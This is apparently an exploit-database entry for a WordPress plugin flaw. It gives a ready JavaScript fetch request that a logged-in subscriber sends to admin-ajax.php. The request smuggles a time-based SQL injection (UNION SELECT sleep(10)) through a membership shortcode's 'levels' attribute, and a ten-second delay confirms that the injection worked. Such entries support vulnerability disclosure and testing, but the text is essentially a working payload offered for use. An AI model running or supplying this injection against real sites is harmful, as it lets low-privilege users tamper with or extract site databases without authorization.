## https://sploitus.com/exploit?id=WPEX-ID:19EF92FD-B493-4488-91F0-E6BA51362F79
While logged in as a subscriber, send the following request:
(await fetch('/wp-admin/admin-ajax.php',{method:'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'},body:'action=parse-media-shortcode&shortcode=[membership delay="Y" levels="(-1)) UNION SELECT sleep(10)-- ,L"]'})).text()
If successful, the request should hang for ~10 seconds, indicating we successfully injected something in the affected SQL query.